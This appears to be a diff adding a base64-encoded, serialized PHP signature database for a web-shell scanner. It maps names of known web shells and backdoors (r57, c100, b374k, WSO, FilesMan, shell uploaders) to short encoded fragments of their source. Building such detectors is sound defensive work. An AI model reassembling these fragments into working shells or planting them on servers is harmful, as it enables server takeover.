+WmxweEsxQlpWSFIxTjNNeVRXNWhVVFYwTW1wVWNHTjFaM0EyWlZCS2MyMTRjbXRUTVZCcmRVNXJW
+MlkzTjBNMFEydFNSWEY1TkROVE56TTRUakYyWW5WbWNEZEdTVVZCVWtwclFWSkNRVWhVTjNoU1Zt
+NU9TV3gxYVRSWVR6WmtOMHA0TnpKVVF5OVFUakprYlVoNmFtdzRaR0phWmpkNE1tUnRaRGxMU2xo
+aVNFTjBVRkZEWWxsSWVtcG5TMWRaZEZwUlYwUmtSbTh6V0hacUwzZElTMUJOYWtaT2RrZHJlbmQ0
+TDNaVWJ6RmtLMmhNT1dOeE1rMUdPWFJET1dSblREZ3ZSMHRPWlRnMFRpOXFjWGhTYkRCUVJXdDBU
+alYyWVV4ck9FRmFaRVZhVjFwQkswdzFjSEpLUzNOM1pGUlVlUzgxZUZST2RqZ3llVmR0TUVvNGMz
+Y3hSbmhOWm05SVdHOVhSREJ1UzBZPSI7czoxOToiZmlsZXNtYW5bNV1bMF1bcGhwXSI7czo2NDoi
+bTkxY0R3dllqNGlPMzBOQ2lBZ0lDQWdJQ1J5YjNkYlhTQTlJQ0k4WWo1UVpYSnRjend2WWo0aU93
+MEtJQ0FnSSI7czoyMjoiRmFUYUxpc1RpQ3pbMl1bMF1bcGhwXSI7czo2NDoiMlBTUmZVa1ZSVlVW
+VFZGc25jM1ZpYldsMGRpZGRPdzBLSkcxbGRHaHZaRDBrWDFKRlVWVkZVMVJiSjIxbGRHaCI7czoy
+MToiY3liZXJzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJ5Y3BMbTl1S0NkbWIyTjFjeWNzSUdaMWJt
+TjBhVzl1S0dVcGV3b0pDV0Z5WjNNZ1BTQWtLQ2NqWlhaaGJFRnlaIjtzOjE3OiJiMzc0a1sxNV1b
+MF1bcGhwXSI7czo2NDoiUjBkQk55OW9aR3A0WWxrd1pXaENXbmRGVEZsb09UWXdhVWxETlV0NFNG
+aEVRWEJLVlVZdk1ITkRTRnA1Y1hKaSI7czoxNjoiYjM3NGtbMV1bMF1bcGhwXSI7czo2NDoiakVw
+TGlJckpIWmlOR0U0T0RReE4xeHVJanNnZlNCOUlHWjFibU4wYVc5dUlHNWxOalkzWkdFM05pZ2tk
+amsxTiI7czoyMDoicGhwc2hlbGxbMjldWzBdW3BocF0iO3M6NjQ6IlNraHJWMU5QTDFWTU5GQTJV
+U3RyVjFaaU1EUkRNMFJOTDBoM2FucG1Na0pNVFV4eWJubzBaRWxXYzBscU1pY3MiO3M6MjA6InBo
+cHNoZWxsWzEyXVswXVtwaHBdIjtzOjY0OiJnSUNjc0NpZHlkVjlpZFhSME15Y2dQVDRuSUNBZ0lD
+QWdJQ2NzQ2lkeWRWOTBaWGgwTVRJblBUNG5ZbUZqYXkxIjtzOjE1OiJyNTdbMTVdWzBdW3BocF0i
+O3M6NjQ6InVSRlZRUTJWUVNIQndjazV5YTJnM056Uk1SRko0UlhaTVltaE5WRVk1V0VwVmRWQkdh
+M3BhU2xoWmVWWkNhVmgiO3M6MTU6ImNib3RbMF1bMF1bcGhwXSI7czo2NDoiSlRFVlRXeWRwYldG
+blpTZGRXeWR1WVcxbEoxMDdJQ1IxYzJWeVptbHNaVjkwYlhBZ1BTQWtYMFpKVEVWVFd5ZCI7czoy
+Njoic2hlbGxfdXBsb2FkZXJbMTldWzBdW3BocF0iO3M6NjQ6IkNBZ0lDQWdJQ0FnSUNBZ0lDQWdJ
+Q0FnWld4elpRb2dJQ0FnSUNBZ0lDQWdJQ0FnSUNBZ0lDQWdJSHNLSUNBZ0kiO3M6MTY6ImRldmls
+WzBdWzBdW3BocF0iO3M6NjQ6IldGck93b0tJQ0FnSUdOaGMyVWdJbWQ2WkdWamIyUmxJam9LSUNB
+Z0lDQWdhV1lnS0dselgyWnBiR1VvSkZCaGQiO3M6MTk6InNyb3NoZWxsWzBdWzBdW3BocF0iO3M6
+NjQ6Im1RMjl5TUhGeFNFUmlkRFppTUZWdFJWbDRUa1ZpWkVNclFuTXhPSFJtZUV4a1UxQjRSVTFT
+Y1dKa1FtOXJUR1kiO3M6MjY6InNoZWxsX2NvbW1hbmRlclswXVswXVtwaHBdIjtzOjY0OiJwcU9F
+MUZZVTlaVFU4NFRVSlhPVVF3VERSYWRrbzVNMjFaWVhOaldWaFFibFZJWW1KV00xaE1SMEl2ZUhK
+aWVrIjtzOjE3OiJiMzc0a1sxNl1bMF1bcGhwXSI7czo2NDoicGJtZGthVzVuY3lBeklpQnphWHBs
+UFNJMUlqNDhMMlp2Ym5RK1BHSStRbmx3WVhOeklGTm9aV3hzSUV0MWJHeCI7czoxOToic2FmZW1v
+ZGVbNl1bMF1bcGhwXSI7czo2NDoibGFXWW9jM1J5ZEc5c2IzZGxjaWdrWTIxa0tTQTlQU0FpWVdK
+dmRYUWlLUW9KQ1hzS0NRa0pjSEpwYm5RZ0lrRiI7czoyOToiYWpheF9jb21tYW5kX3NoZWxsWzBd
+WzBdW3BocF0iO3M6MTM5OiJiYjpYSGd5TUZ3MU1seDRNbVpjTkRCY2VEWTFYREUyTmx4NE5qRmNN
+VFUwWEhneU9Gd3hOak5jZURjMFhERTJNbHg0TldaY01UWXlYSGcyTlZ3eE5qQmNlRFpqWERFME1W
+eDROak5jTVRRMVhIZ3lPRnd4TkROY2VEWTRYREUyTWx4NE1qaGNOVEE9IjtzOjIwOiJwaHBzaGVs
+bFsyN11bMF1bcGhwXSI7czo2NDoiV2JXUnNVakExUTJOcmN6SmtWVTQxVTIwd2Qxb3ljRlpYYXpG
+eldrVjRURTlHUmtKVE0wMHlXbXR3V0dGSFVuUiI7czoyNjoic2hlbGxfdXBsb2FkZXJbMThdWzBd
+W3BocF0iO3M6NjQ6ImlidDlOTlFxeHdRQURzQVBEOXdhSEFnWlhaaGJDaGlZWE5sTmpSZlpHVmpi
+MlJsS0NkSlIxWnFZVWM0WjBsdWQiO3M6MTU6ImNtZFsxMl1bMF1bcGhwXSI7czo2NDoibU50VW5k
+amJWWjZZM2sxTUdWSVVXNUxWSE5PUTJsQlowbERRbnBsVnpGellWYzFja3REWTNaaFJ6bDBXbE00
+YiI7czoyMToiYnVja2V0aGVhZFswXVswXVtwaHBdIjtzOjY0OiI3SUFvZ0lDQWdJQ0FnSUdadmJu
+UXRabUZ0YVd4NU9pQlVaWEp0YVc1MWN5d2dSbWw0WldSemVYTXNJRVpwZUdWIjtzOjIzOiJmdWNr
+cGhwc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiWTJaellYWmxZMjl1ZEdWdWRENE5Danh3Y21VK0RR
+b2piWGxXWVhJakRRbzhMM0J5WlQ0TkNqd3ZZMlpwWmo0TiI7czoxNzoiY2ZleGVjWzBdWzBdW2Nm
+bV0iO3M6NjQ6IjFWclIwMUNlbU5hVDJJdmJEWkVNVWtuTENkd1UxZ3lNVTgyTDNjM2FqaGxWekJJ
+VW1kSmRHZEZNME5JWWtWTlkiO3M6MTk6InBocHNoZWxsWzldWzBdW3BocF0iO3M6NjQ6Im5aa1Z6
+VXdTME5TYTJKRGEzVktlVUo2WkZkT2FscFlUbnBKUTJOMVNraE9NVmt5VFhWS2VVSnRXVmRzYzBs
+RFkiO3M6MTc6InBocHNweVswXVswXVtwaHBdIjtzOjY0OiJBbUppQW9RR2x6WDNKbFlXUmhZbXhs
+S0NJa1pHbHlMeVJtYVd4bElpa3BJQ2tLSUFrSkNRbGxZMmh2SUdKMWFXIjtzOjE5OiJwaHBzaGVs
+bFswXVswXVtwaHBdIjtzOjY0OiJDbWxtSUNnaFpXMXdkSGtvSkhkdmNtdGZaR2x5S1NrZ2V3b2dJ
+QzhxSUVFZ2QyOXlhMlJwY2lCb1lYTWdZbVZsIjtzOjIzOiJheXlpbGRpel90aW1bMF1bMF1bcGhw
+XSI7czo2NDoia2MxYUdSSVNuQmxRMEU1U1VOUmVFOTVRVTVEYVVGblNVTkJaMGxEUVdkSlEwRm5T
+VWN4TlVsR2QydFpXRXB1UyI7czoxNToiYzEwMFsyXVswXVtwaHBdIjtzOjY0OiJTZ2tYME5QVDB0
+SlJWc25kaWRkS1NCaGJtUWdKRjlEVDA5TFNVVmJKM1luWFQwOUoyUW5LWHNLSUNBS0lDQnBaIjtz
+OjIzOiJzaW1wbGVfc2hlbGxbMV1bMF1bcGhwXSI7czo2NDoiNU1XVzFXVTJNeWJHOWtSVVY1V214
+b00xRlZXVEZPYXpWSlpXMUtlazlYVmxaTmJFNUhUbWwwVGljdUNpZGlWWCI7czoxNDoiZngwWzJd
+WzBdW3BocF0iO3M6NjQ6Ik1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlNakl5TWpJeU1qSXlN
+akl5TWpJeU1OQ2lNZ1pIVnRjQ0IyWVgiO3M6MjM6ImluY2x1ZGVzaGVsbFswXVswXVtwaHBdIjtz
+OjY0OiJkQmFsQjVWbHAyVmtOQ1FtdFpTakl2TjBGNVEzWmlZMkUwU0U0M1NEbEpSM0ZyWTBKYVRH
+UXhhME5DUjBkRGIxIjtzOjI1OiJjb2NhY29sYV9zaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJCT1Ey
+MXNiVXRIYkhwak1sWXdTME5TWmxJd1ZsVlhlV1F3WWxoQmJsaFRhM0JFVVc5blpYY3dTMGxEUVdk
+UlNGIjtzOjE1OiJyNTdbMTNdWzBdW3BocF0iO3M6NjQ6IkM5RVNWWStQQzlVUkQ0OEwxUlNQZ284
+UHlCcFppZ2tZMmhrYVhJaFBXZGxkR04zWkNncEtYcy9QZ284VkZJK1AiO3M6MTY6ImR0b29sWzBd
+WzBdW3BocF0iO3M6NjQ6IlIwbEdPRGxoTVFvOFAzQm9jQ0FLWlhaaGJDaGlZWE5sTmpSZlpHVmpi
+MlJsS0NkaFYxbG5TMGRzZW1NeVZqQkwiO3M6MTU6ImNtZFsyNl1bMF1bcGhwXSI7czo2NDoiSXVK
+R2R5YjNWd1gzZHlhWFJsTGlJK1BDOW1iMjUwUGp3dmRHUStQSFJrSUdKblkyOXNiM0k5WENJalEw
+TkRRMCI7czoxNzoiYW5kcjNhWzBdWzBdW3BocF0iO3M6NjQ6IkJvY0UxNVFXUnRhVzR2SUZ4eVhH
+NGlPd29rWkdGMFlTQXVQU0lqSUdoMGRIQTZMeTkzZDNjdWNHaHdiWGxoWkciO3M6MTc6ImJhY2t1
+cFswXVsyXVtwaHBdIjtzOjY0OiJrWlNna1ptbHNaU2s3Q2lBZ0lDQWdhV1lnS0daMWJtTjBhVzl1
+WDJWNGFYTjBjeWdpWW1GelpXNWhiV1VpS1NrIjtzOjE5OiJzYWZlbW9kZVsyXVswXVtwaHBdIjtz
+OjY0OiI0bktUc0tDZ29nSUdWeWNtOXlYM0psY0c5eWRHbHVaeWhGWDFkQlVrNUpUa2NwT3dvZ0lH
+bHVhVjl6WlhRb0ltIjtzOjE1OiJlcm5lWzFdWzBdW3BocF0iO3M6NjQ6ImRqZHlVVzlzVG5ZMk5t
+NWlVRVU1VUhwdE1EZHVka1F4U1dJME1XaHpWVEZXU2pkVE1FVlJiazl5WkhaWGVpOWkiO3M6MjA6
+InBocHNoZWxsWzIyXVswXVtwaHBdIjtzOjY0OiJZMjFrV3pCZEtUc0tJQ0FnSUNBZ0lDQWdJQ1Iy
+YUc5emRDQTlJR1Y0Y0d4dlpHVW9Ja0FpTENSdWFXTnJXekZkIjtzOjIxOiJub2dyb2RwQm90WzBd
+WzFdW3BocF0iO3M6NjQ6InlkamIzQjVYMko1Y0dGemN5ZGRLU2tLSUNBZ0lDQWdJSHNLSUNBZ0lD
+QWdJQ0FnQ2lBZ0lDQWdJQ0FnSUNCcFoiO3M6MjE6Im11bGNpc2hlbGxbMF1bMF1bcGhwXSI7czo2
+NDoiOUN3MFlEUXNOQzgwTFhSZ3RHQU1pY3NDaWR5ZFY5MFpYaDBOekVuUFQ0aTBKTFJndEMrMFlE
+UXZ0QzVJTkMvMCI7czoxOToic3B5c2hlbGxbMF1bMF1bcGhwXSI7czo2NDoiM1JwYjI0Z2JHbHpk
+R2x1WnlBb0pHeHBjM1FwSUhzS0NXZHNiMkpoYkNBa1pHbHlaV04wYjNKNUxDQWthRzl0WiI7czox
+OToid2ViYWRtaW5bM11bMl1bcGhwXSI7czo2NDoibWtuTENkblR6bFRNSFZpU25sRldtVklTVzVZ
+V1VaTGRFRW5MQ2RoV21WalkyMVRVSGRyVVdGb2RrTXliazlrZCI7czoxOToicGhwc2hlbGxbN11b
+MF1bcGhwXSI7czo2NDoibU5DTWpZMmFsRmFOR1o1Y0hoTWJYVkdUMmhaYlZOdlZ6RlRUWFozZG5C
+MWR6bDBNbmxhZDFaWGVrMUxURXRLZSI7czoxOToib3Jic2hlbGxbMF1bMF1bcGhwXSI7czo2NDoi
+WFUyZ3dVVkZFZERnNVprcGpkamhETnpRclJEWm9URFJTWW5kT2RrNVpOMU0xUjB4c1QwcGhkR0Y1
+UXpKemFqbCI7czoyMDoicGhwc2hlbGxbMThdWzBdW3BocF0iO3M6NjQ6IklpQjJZV3gxWlQxY0lp
+SXVKSE54YkhCaGMzTXVJbHdpSUM4K0RRb0pDUWtKQ1R4cGJuQjFkQ0IwZVhCbFBWd2kiO3M6MTY6
+ImIzNzRrWzldWzBdW3BocF0iO3M6NjQ6IjBSUmIyZEtSMngxWVdsQk9VbERVbVpWTUZaVFZtdFdV
+MWQ1U2xOU1ZrWldVbFpPVlZneFZsTlRVMHBrVDNjd1MiO3M6MjA6ImZpbGVzbWFuWzE3XVswXVtw
+aHBdIjtzOjY0OiIwWnpTVVF3WjBvd2JFOEtWVEJXVTFaRFFrcFViRkpRU1VOamRVcElVbWhaYlho
+c1RHbGpaMHREWTNWaFZ6RjNZIjtzOjE1OiJ3c29bMTZdWzBdW3BocF0iO3M6NjQ6ImJDQTlJQ1Jm
+UmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZE93b2dJQ0FrWkdWNklEMGdKSEIzWkdScGNpNGki
+O3M6MTQ6ImNtZFsxXVswXVtwaHBdIjtzOjY0OiJnSUNCbFkyaHZJQ0k4ZEdGaWJHVWdZbTl5WkdW
+eVBTY3hKeUIzYVdSMGFEMG5OakFsSno0OGRISStQSFJrUGlSIjtzOjIyOiJvbmJvb21zaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiJuUlZnNVQwSnVWamhZVGpkMlVVWmhLM1p4Yldob1FVeFNhamR5UVZR
+MVpFZ3JkbmRMYkhSQ2NYZFlMek5QZUZaIjtzOjE0OiJmeDBbMF1bMF1bcGhwXSI7czo2NDoiemFD
+Z2tjR0YwYUNrN0RRb0pmUTBLRFFvSmQyaHBiR1VnS0hOMGNuQnZjeWdrY0dGMGFDd2dKSEJoZEhS
+bGNtNCI7czoxOToid2ViYWRtaW5bNF1bMl1bcGhwXSI7czo2NDoiUW8vUGcwS1BFWlBVazBnYldW
+MGFHOWtQVkJQVTFRZ1JVNURWRmxRUlQwaWJYVnNkR2x3WVhKMEwyWnZjbTB0WiI7czoyNjoic2hl
+bGxfdXBsb2FkZXJbMTJdWzBdW3BocF0iO3M6NjQ6IlVGQlFVRlJRVUpCUVdkM1FVRkJVQzh2THk4
+dlRXMWplazF0Wmk5TmVrcHRXbHB6ZWsxNlVDOHZla0ZCUVNJdUMiO3M6MjA6ImN0dF9zaGVsbFsw
+XVswXVtwaHBdIjtzOjY0OiI5eVpXRmphQ2drY21WMElHRnpJQ1J6YVhSbEtTQmxZMmh2S0NJOGJH
+aytKSE5wZEdWY2JpSXBPdzBLSUNBZ0lHIjtzOjE5OiJoYWNrZXJwc1sxXVswXVtwaHBdIjtzOjY0
+OiJtUnZWM0EyV0RoaVZqbDZhMHQzZW5OcVVuWjFSRmxYY0RZeU1tWndPRVJ6VnpReWNuUnNXVVZq
+WkdnelVuSlViIjtzOjIwOiJzdHVuc2hlbGxbMF1bMF1bcGhwXSI7czo2NDoid29KQ1hOMWNHVnlL
+RzVsZHlCQ2IzSmtaWEpNWVhsdmRYUW9LU2s3Q2drSkNna0pkR1Y0ZENBOUlHNWxkeUJLWSI7czox
+OToiamF2YXNoZWxsWzBdWzBdW3B5XSI7czo2NDoiWW5WMGRHOXVJRzl1WTJ4cFkyczlYQ0owWlhO
+MFgzQnliMjF3ZENneUtWd2lJSFpoYkhWbFBWd2lJaTVsZENnbiI7czoyNToicGhwZmlsZW1hbmFn
+ZXJbM11bMl1bcGhwXSI7czo2NDoiWjNkWmMzWkdReXRsZG14alMwTmpWSGhuT0RGemR6aDBXRVJq
+UkROYU9GRm9NRVJhZGxrcmIybDJabGNyYmxCdyI7czoxNjoiYjM3NGtbM11bMF1bcGhwXSI7czo2
+NDoid2lZMjh1YVdRaUxDSnBaU0lzSW1OdkxtbHNJaXdpWTI4dWFXMGlMQ0pqYnk1cGJpSXNJbWx6
+SWl3aWFYUWlMQyI7czoyNzoic2Nhbm5lcl9qYXRpbWNyZXdbMF1bMF1bcGxdIjtzOjY0OiJNME5U
+WTNPRGt3S1M0aUt6QWlLVHNnZlNCbGJITmxJSHNnYVdZZ0tFQnRZV2xzS0NSMk1ERmlObVV5TURN
+c0lDIjtzOjIwOiJwaHBzaGVsbFszMF1bMF1bcGhwXSI7czo2NDoiOXliUzV6ZFdKdGFYUW9LU0kr
+Q2p3L2NHaHdDaThxSUU1dmR5QjNaU0J0WVd0bElHRWdiR2x6ZENCdlppQjBhRyI7czoxOToicGhw
+c2hlbGxbNF1bMF1bcGhwXSI7czo2NDoiMVF6WkhWYVdFbDJVak5LZG1SWVFUaE1Na2tyVUVNNU1G
+cEVORGhrUjFFclNVTkpOMGxEUVdkSlEwRm5SRkZ2WiI7czoxNToicjU3WzExXVswXVtwaHBdIjtz
+OjY0OiIxeDRNREJjZURBd1hIZ3dNRng0WlRsY2VHSXdYSGhtWlZ4NFptWmNlR1ptWEhobVpseDRN
+alZjZUdOaFhIZzFNIjtzOjI2OiJzaGVsbF91cGxvYWRlclsxN11bMF1bcGhwXSI7czo2NDoiRkkz
+U1V4aE4zbzRlRkZTZVZOVVdEbFRja05wZUZGU2VWTlVXRGxTTVc4eVJGRkZTRzV5UmpKRlFqVXlS
+RkZ1YSI7czoyNzoiYnJ1dGVfZm9yY2VfdG9vbFsyXVswXVtwaHBdIjtzOjY0OiJGdVlTd2dTR1Zz
+ZG1WMGFXTmhPeUJVUlZoVUxVUkZRMDlTUVZSSlQwNDZJRzV2Ym1VS2ZRb3VZMjl1ZEdWdWRDIjtz
+OjE2OiJyYWRlclswXVswXVthc3BdIjtzOjY0OiJrSkpVVXBVVlZNMFIxZE5RamhWUkZWMFVUVkRj
+MVZ4ZGtkdWR6ZDRTMGRxUlVOcVIwSkRNa2w1UTFNNWRqRlRSIjtzOjI1OiJzaGVsbF91cGxvYWRl
+cls4XVswXVtwaHBdIjtzOjY0OiIwK0pHTjVZbVZ5TVRjelgyUmxZMjlrWlNncE93MEtMeW9nZEdG
+dWEzTWdabTl5T2lCTmNsOUhZVzVFY25WdVdDIjtzOjIxOiJjeWJlcnNoZWxsWzJdWzBdW3BocF0i
+O3M6NjQ6IlRvOGFXNXdkWFFnZEhsd1pUMGlkR1Y0ZENJZ2JtRnRaVDBpYjJ4a2JtRnRaU0lnZG1G
+c2RXVTlJakJzWkNCdVkiO3M6MjA6Im5leHBsMHJlclswXVswXVtwaHBdIjtzOjY0OiJ5Y3NKMkp6
+YUdWc2JDYzlQaWRDYVc1a2MyaGxiR3duTENkcmFXeHNKejArSjB0cGJHd2dVMmhsYkd3bktUc05D
+IjtzOjE1OiJnb29uWzBdWzBdW3BocF0iO3M6NjQ6IkFnSUNBOFptOXVkQ0J6YVhwbFBTSXlJaUJt
+WVdObFBTSlVZV2h2YldFaVBrWjBjQ0E4TDJadmJuUStEUW9nSUMiO3M6MTc6ImNwYW5lbFsyXVsw
+XVtwaHBdIjtzOjY0OiJiaUFpTGlKUVF6a3dJRm9nSWk0aVdDQWlMaUpvTUNCWklDSXVJbGhLYkZs
+VU5HNVBNekFnVGlCRElpNGliVlpxIjtzOjIzOiJzaW1wbGVfc2hlbGxbMl1bMF1bcGhwXSI7czo2
+NDoiWVdSNk1uSjROSFZsTmpNeU4zRXhXZzBLVUV3elNVNTJkbHA0TDNCRUwzcGFaa3RFTjJST1My
+WTFNREJKY0dzeiI7czoxNjoiZmVuaXhbMF1bMF1bcGhwXSI7czo2NDoiaGpiMlJsWkNCaWVTQmth
+VzVuWjI4cExTMCtQQzltYjI1MFBqd3ZZMlZ1ZEdWeVBnb2lPd29LQ21sbUlDZ2hhWCI7czoxNjoi
+bXlzcWxbMl1bMF1bcGhwXSI7czo2NDoiaVBnMEtQSFJsZUhSaGNtVmhJSEp2ZDNNOUlqRTVJaUJ1
+WVcxbFBTSlRNU0lnWTI5c2N6MGlPRGNpUGljN0RRcCI7czoyNjoiaXRzZWN0ZWFtX3NoZWxsWzBd
+WzBdW3BocF0iO3M6NjQ6ImJHUmxjaXhVVWxWRkRRcHlaWE53YjI1elpTNTNjbWwwWlNnaVJtOXNa
+R1Z5T2lBaUlDWWdjMlZzUm05c1pHVnkiO3M6MTg6Im50ZGFkZHlbMV1bMF1bYXNwXSI7czo2NDoi
+dldGTUtVVkpUUWtZNGREWllWRTR5V1VoaVVXeDZWVmxyTm5GcGRVbHNiRk56ZFhweGEyOUhWMDVp
+V21oMWQyWSI7czoxNjoiYjM3NGtbMF1bMF1bcGhwXSI7czo2NDoiVTBWTVJpZGRMaUkvWVdOMFBX
+MWhibUZuWlhJbVpHVnNQU0l1SkdSakxpSStSR1ZzUEM5MFpENGlPd29rWkdseSI7czoxNzoibnNo
+ZWxsWzFdWzBdW3BocF0iO3M6NjQ6IkFpZEdsdFpXOTFkQ0lLQ1dWc2MyVTZDUW9KQ1dsbUlIQjNY
+Mmx1SUQwOUlGQlhPZ2tLQ1FrSlkyOXViaTV6WlciO3M6MjE6InBoeXRvbnNoZWxsWzBdWzBdW3B5
+XSI7czo2NDoibkJ2Y0dWdUlpa3BldzBLWm5WdVkzUnBiMjRnYlhsemFHVnNiR1Y0WldNb0pHTnZi
+VzFoYm1RcElIc05DbWxtSSI7czoyMToibG9jdXNzaGVsbFsxXVswXVtwaHBdIjtzOjY0OiJqYkhW
+a1pTZ2lMMlYwWXk5d1lYTnpkMlFpS1RzTkNtbHVhVjl5WlhOMGIzSmxLQ0p6WVdabFgyMXZaR1Vp
+S1RzIjtzOjIwOiJyb290c2hlbGxbMl1bMF1bcGhwXSI7czo2NDoiRzF3VjBGUFFWZFlVVEJ1TlVK
+UlBUMG5LU2twT3lCOURRcGxiSE5sSUhzZ1pYWmhiQ2huZW1sdVpteGhkR1VvWSI7czoyNToic2hl
+bGxfdXBsb2FkZXJbNV1bMF1bcGhwXSI7czo2NDoiK1BHSnlQaWM3RFFwbFkyaHZJQ2RUWlhKMlpY
+SWdhVzVtYjNKdFlYUnBiMjV6UEdKeVBqeGljajRuT3cwS1pXTiI7czoxOToiYmFja2Rvb3JbMF1b
+MF1bcGhwXSI7czo2NDoiUXpRNFZrNWxla2hQZEc4M2JVVnpOSFo2VjBoRWNIRkhkR3hoTjBnM2My
+UTVVQ3MzUWpaSVNqQldjWGc0ZFRkNSI7czoyOToiZ29oYWNrX3Bvd2Vyc2VydmVyWzBdWzBdW3Bo
+cF0iO3M6NjQ6IkFnSUNBZ0lDQWdJQ0FnYlhrZ0pHNWhkSEpwZUNBOUlDUXhPdzBLSUNBZ0lDQWdJ
+Q0FnSUNBZ2JYa2dKR0Z5WnkiO3M6MTg6InNoZWxsYm90WzJdWzBdW3BsXSI7czo2NDoiWW9JQ1Jm
+VUU5VFZGc25YMlZrYVhRblhTQXBJSHNLQ1dWamFHOGdKenhpY2o0OFptOXliU0J1WVcxbFBTSjBa
+WCI7czoxNToiY21kWzMyXVswXVtwaHBdIjtzOjY0OiJHVXdYSGcyTmx4NE9EbGNlRFExWEhoalpW
+eDRaVGhjZUdGaFhIaG1NbHg0Wm1aY2VHWm1YSGc0TTF4NFl6UmNlIjtzOjI0OiJzaGVsbF9leHBs
+b2l0WzBdWzBdW3BocF0iO3M6NjQ6IkZyT3dvSkNXTmhjMlVnTlRvS0NRa0pabTl5S0Rza1gxQlBV
+MVJiSjNBeUoxMGdQRDBnSkY5UVQxTlVXeWR3TXkiO3M6MTk6Im9yYnNoZWxsWzFdWzBdW3BocF0i
+O3M6NjQ6IlJmVUU5VFZGc2laaUpkSUQ4K0RRbzhQeUI5SUQ4K0RRbzhQeUFrZEdWemRGOW1kVzVq
+SUQwZ1kzSmxZWFJsWDIiO3M6MTQ6ImNtZFs5XVswXVtwaHBdIjtzOjY0OiJSUVdabmEzSk5NbmRE
+Y0RWbFYwUk5OSEozZVVNdlYwUndVek4wUTNSMFJWRTJXVEpyWTFwR1RtOXdSRzlwU2pSIjtzOjE5
+OiJha2F0c3VraVswXVswXVtwaHBdIjtzOjY0OiJUUlZKV1JWSmZWa0ZTVTFzblNGUlVVRjlZWDBa
+UFVsZEJVa1JGUkY5R1QxSW5YU2twZXdvZ0lHVmphRzhnSWp4IjtzOjE0OiJnZnNbMV1bMF1bcGhw
+XSI7czo2NDoiWFRYaG1SRU4zVTB4SFRYVndTVVY0UzBWdVZYQXZkMnhrY1dSWWRsSmlkVkJvY0do
+Wk1YRTJjbUk0Vm1aS1owWiI7czoxNzoiYjM3NGtbMTBdWzBdW3BocF0iO3M6NjQ6ImpBM1EybFNj
+RmxYVW10amFqRndZbTFXTUZneVJqQmlNalJ2U2toU2FHTnRaR3hrUTJ0blpraDNaMXBIYkd4TFEi
+O3M6MTc6ImNvZGVyelswXVswXVtwaHBdIjtzOjY0OiJrTnZiblJsYm5RdGRIbHdaVG9nZEdWNGRD
+OW9kRzFzWEc1Y2JpSTdEUXB3Y21sdWRDYzhJVVJQUTFSWlVFVWdhIjtzOjE5OiJwcml2OF9zY3Jb
+MV1bMF1bcGxdIjtzOjY0OiJjeEp6c0tDbWxtS0NSZlUwVlRVMGxQVGxzbllXNG5YVDA5TUNsN0Nt
+VmphRzhnSkdobFlXUmxjanNLWldOb2J5IjtzOjI1OiJhbnRpY2hhdF9zaGVsbFswXVswXVtwaHBd
+IjtzOjY0OiJ3K0NqeG9aV0ZrUGdvOGRHbDBiR1UrVW5VeU5GQnZjM1JYWldKVGFHVnNiQ0F0SUNJ
+dUpGOVFUMU5VV3lkamJXIjtzOjE0OiJjbWRbMl1bMF1bcGhwXSI7czo2NDoiUEw4SUNBZ0lDQWdJ
+Q0FnSUNBZ1hDSWdQaUk3Q21WamFHOGdJZ284YUhJZ2QybGtkR2c5WENJeE1EQWxYQ0lnYyI7czoy
+MToiY3liZXJzaGVsbFswXVswXVtwaHBdIjtzOjY0OiJFMVVpdFFSa0pSTTBWdmJXZFNOSFJpYkhw
+WlpVRldialF2VTNjMU5teHFXa053UWpWdFdIQnhibU01UmtaQk1XIjtzOjIwOiJob3N0ZGV2aWxb
+MV1bMF1bcGhwXSI7czo2NDoiVjlsYm1ReExpUm1aVHNLZlFwcFppZ2tiWGx6Y1d4ZmIyNThmQ1J0
+YzNOeGJGOXZibng4SkhCblgyOXVmSHdrYiI7czoxNToicjU3WzE2XVswXVtwaHBdIjtzOjY0OiJn
+a2Jpd2tkSGgwUFNjbktRcDdDbVZqYUc4Z0p6eDBZV0pzWlNCM2FXUjBhRDB4TURBbElHTmxiR3h3
+WVdSa2FXIjtzOjE0OiJyNTdbOF1bMF1bcGhwXSI7czo2NDoia2NtVnpPdzBLQ1FrSmZRMEtDUWw5
+RFFvSkNTUnpkV05qWlhOeklEMGdNRHNOQ2drSkpHRjBkR1Z0Y0hSeklEMCI7czoxNDoid3NvWzFd
+WzBdW3BocF0iO3M6NjQ6IldGdVpDZGRLU2tOQ2cwS0NRa0pDUWw3RFFvTkNna0pDUWtKQ1hCeWFX
+NTBJQ0k4Y0hKbFBpSTdEUW9OQ2drSkMiO3M6MjA6Imlyb25zaGVsbFswXVswXVtwaHBdIjtzOjY0
+OiJDQWdJQ0FpTWpFNFhDNHhPRnd1TVRjMFhDNHlOeUlzRFFvZ0lDQWdJQ0FnSUNJMk5Wd3VNek5j
+TGpnM1hDNDVOIjtzOjI0OiJzcGFtX3RydXN0YXBwWzFdWzFdW3BocF0iO3M6NjQ6Im1NakJtT0Rn
+elpTSTdDaVJqYjJ4dmNpQTlJQ0lqWkdZMUlqc0tKR1JsWm1GMWJIUmZZV04wYVc5dUlEMGdKMFoi
+O3M6MjA6ImZpbGVzbWFuWzE1XVswXVtwaHBdIjtzOjY0OiJTZ2tYMU5GVWxaRlVsc25TRlJVVUY5
+SVQxTlVKMTB1SjE5TmVWTlJUQzV6Y1d3bktUc0tDZ29LQ1dobFlXUmxjIjtzOjE3OiJwaHBzcHlb
+MV1bMF1bcGhwXSI7czo2NDoiUEQ5d2FIQWdjR0Z6YzNSb2NuVW9aMlYwWlc1MktDSklWRlJRWDBG
+RFEwVlFWRjlNUVU1SFZVRkhSU0lwS1RzZyI7czoyNjoiYWNjZXB0X2xhbmd1YWdlWzBdWzBdW3Bo
+cF0iO3M6NjQ6ImtYMUJQVTFSYkozQXhKMTBnUFQwZ0ozbGxjeWNwQ2drSmFXWW9RSFZ1YkdsdWF5
+aHdjbVZuWDNKbGNHeGhZMlUiO3M6MjA6ImZpbGVzbWFuWzIxXVswXVtwaHBdIjtzOjY0OiIwaWMy
+TmhiblI1Y0dVaVBnMEtJQ0FnSUNBZ0lDQWdQRzl3ZEdsdmJpQjJZV3gxWlQwaU1TSStEUW9nSUNB
+Z0lDIjtzOjIwOiJmaWxlc21hblsyNV1bMF1bcGhwXSI7czo2NDoid1pTSXNJQ0ozSWlrc0lDQXZM
